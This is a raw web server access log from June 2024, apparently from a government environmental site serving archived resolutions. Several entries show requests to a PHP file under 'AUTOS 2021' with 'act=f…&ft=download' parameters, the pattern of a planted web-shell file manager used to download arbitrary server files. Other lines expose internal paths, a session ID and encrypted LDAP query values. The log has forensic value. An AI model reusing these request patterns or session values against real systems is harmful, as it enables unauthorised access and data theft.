47.128.123.230 - - [28/Jun/2024:05:59:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=revision.php&ft=download HTTP/1.1" 200 5022
207.46.13.107 - - [28/Jun/2024:05:59:55 -0500] "GET /BLA/resoluciones/AUTOS%202013/3664.pdf HTTP/1.1" 200 576443
207.46.13.107 - - [28/Jun/2024:05:59:56 -0500] "GET /Publicaciones/2024EE123416.pdf HTTP/1.1" 404 228
201.245.192.253 - - [28/Jun/2024:06:00:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.198 - - [28/Jun/2024:06:00:09 -0500] "GET /Publicaciones/2024EE102500.pdf HTTP/1.1" 404 228
47.128.17.27 - - [28/Jun/2024:06:00:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=4029.pdf&ft=download HTTP/1.1" 200 347815
47.128.28.73 - - [28/Jun/2024:06:00:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos&f=Spot_CambioClimatico.flv&ft=download HTTP/1.1" 200 1166998
47.128.28.86 - - [28/Jun/2024:06:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimg%5C&f=logo_Bicentenario.gif&ft=download HTTP/1.1" 200 5864
172.22.2.4 - - [28/Jun/2024:05:59:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.29.101 - - [28/Jun/2024:06:00:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1001-1050&f=00001037.tif&ft=download HTTP/1.1" 200 110022
201.245.192.253 - - [28/Jun/2024:06:01:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.121.8 - - [28/Jun/2024:06:01:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages&f=page58.swf&ft=download HTTP/1.1" 200 32437
201.245.192.253 - - [28/Jun/2024:06:01:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:06:01:27 -0500] "GET /autoliquidacion/Grupo%20Forestal%20-%20Industria%20de%20la%20Madera/4-%20SOLICITUD%20DE%20CERTIFICACI%C3%93N%20DE%20INDUSTRIAS%20FORESTALES.xlsx HTTP/1.1" 200 31982
66.249.66.11 - - [28/Jun/2024:06:01:37 -0500] "GET /BLA/resoluciones/Autos%202008/0536.pdf HTTP/1.1" 200 173328
172.22.2.4 - - [28/Jun/2024:06:00:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
66.249.66.11 - - [28/Jun/2024:06:01:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20401-450/00000436.tif HTTP/1.1" 200 59396
201.245.192.253 - - [28/Jun/2024:06:02:03 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:06:02:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20601-650/00000619.tif HTTP/1.1" 200 37268
66.249.66.13 - - [28/Jun/2024:06:02:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20401-450/00000416.tif HTTP/1.1" 200 58376
66.249.66.12 - - [28/Jun/2024:06:02:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20401-450/00000417.tif HTTP/1.1" 200 59016
181.53.13.164 - - [28/Jun/2024:06:02:45 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+w6CB6SF8ehRsU1w/FSJY+KfwdhmjI1ZgLYOIUFldODLI6Kox1rqzD&y=U2FsdGVkX19V9jGfG3Bv+/lX4iVcHZPMpYd1Ha21qdmztqxSFklnf3KtUlrdrJUP HTTP/1.1" 200 30
181.53.13.164 - - [28/Jun/2024:06:02:46 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18GojrprzGRtVgpfMs9q0IZk5uwKDZ4c1AIsMoI8q48Xt0IoMvxiN6Bywzv3eXp6OfHRkR0nKiFEtKY/w33n8BDUrsXJuzVxkA=&u=U2FsdGVkX197kY1htStQhaL7rabfbnmE/IplwGil85Y=&y=U2FsdGVkX19V9jGfG3Bv+/lX4iVcHZPMpYd1Ha21qdmztqxSFklnf3KtUlrdrJUP HTTP/1.1" 200 97
181.53.13.164 - - [28/Jun/2024:06:02:46 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/YakwXhyr3VqIQcQt3lGsCoEMBEsCAWYcGoZdv5Ck7/syE9Pls0xWPdF7e67ehQgIs0Ylem25GByMXfIIdxbB0NvCfO5d3xcdQWSHx8TqKC5JYH/MJaw8CCkg5gu8WYKDwWEi9ywGAZFCYa3llwpvCCyIUjQA/8Uf0SQeJUAZUDtLjTDZtqh4C2kSa13na9zW1+BwZhpjjao12QVW8R8VratCDHF8/G5ZcxmwJmivJQhGTG2ShjpbLz4eIHmiK7pogucHCqzbFFPxcBgfHePCPFyXHRQqahI9dLIczc2sDcnCU5Bfx7ekdjVH3BDLHxOskADelpz1SJGB0FgdN9d6zrepWClMglcMOu1yq8ex41ptbBWxgChZ/WJJwQn9ww32JjRL+0+O2MGpMZGYvJH860tZ64OE91qnor0Kk/3xDJvEOsVeBgv1W0R66aBTgM4aVCuU9wIMwQJlo/z7MM3/eIp+s9P18flAOqNkHZC+PLijzGx4NxZt+ejw6qIwQ2ne99FVkCWrlVMzIiqKySysmwQuvSJaJEAeNHF3RYrkRI/TAYRr8H3da6W0w+QwAbN02G9GLq1qGpS/1qkd992LQD05Audut7fbAVgn0S5XPEkrdcWYwOhC829KYHSXwg29VonBIYpbuO7GuEUb3h4pOE6j4EymUWXanvQ0lNLW2c4KPlxbVy2M8iWiV4xAMwsk69kkAqVVbAQHj5HWT/sRdjl9h/fvr3l8LwCsY/Q1MNfNQHrstxNpnhRDWfC3/jiKSbJWHTNUaanTYcoOLgv8YZZzfKSG4kg63pZ8y9vgow2RHhWG3jFuLuwbvBroBJQh/MLrixEr4qWkTo9ok3dt/UMUnoYCs3rwaZxKZq5lUH0wRx4mZgyPIRUgmVes+xDxcnvZ73/IqZtEEQ/dlfAohD5yEqOEdfJINAcqYREvBgTaApBgph2npZxJXNG5ptwxJZNPPHKhFo9OpnRhoVYbYJek6Gtn/YY/hCiymUfkHdwQ6u8hBHZqidlvLwbddBPIKpQc5QLMeIGgc2G9kJOLJ3+3UVyLpKQF6Yc0oeR64Pb0nh/JzPBUkIlCo1FCFJG2zm33m/oHfoxdug0Fv87LHRUHGm/fGgdHj2eO8Ak6CWaKTGBKf/bmvDeLUTTTnOq1InS+HnP5x0em8UKYeMFji4YM4GJ/QW5yi/BIM0EO7y8L/e2D18Wto8cb5nJZwKGU7ScUmNuEeLdZk92Mz3PJ++dOqCtejhlSXPPCboSXwPwg6lcAqmJCf1IEpbs+imMmukMwKR19BLcvO8SmQIOaPswkWiLKQ8A+UvkjQFiGX4XTUV4H0pi7GMcDo34RpAAr/SfDt62NnpdTnOV8hRor++yms1cazHIgbuam+KmBumUA0Fnivolprmm7FHjlUSjmDiaYkfCmQDp/CvLnooam49380ykJBywSxo4cHEFiYpkrKZiKH0QaoN62nhc06xwUJpBrUY8DsnkM0unfEQQamYwKgS2wvRWF+glRDQoxjbnuCOkBi+Lr9e0y4esJAKFkivKby79uUbn5WPxSwWIOdal+B9owCCFkEpUXP/GHtRf/qYn45tWyBvPG9zQlz4U23CrD4xWIrEi1MgQCLQtZaPtLi9VPHnJjmRY6mk94hTAjgNitgNuFHF68VqtWU/mt/fc/wCA6uFaAGEdJatbMu3CCi1UuJKkYm4ikMvmCfupLhKZkZzRYu+/P/IOjOg3zYZ3w4S5NomFQ3ZgHB3RUZi9tlrYZYkos=&u=U2FsdGVkX197kY1htStQhaL7rabfbnmE/IplwGil85Y=&y=U2FsdGVkX19V9jGfG3Bv+/lX4iVcHZPMpYd1Ha21qdmztqxSFklnf3KtUlrdrJUP HTTP/1.1" 200 2362
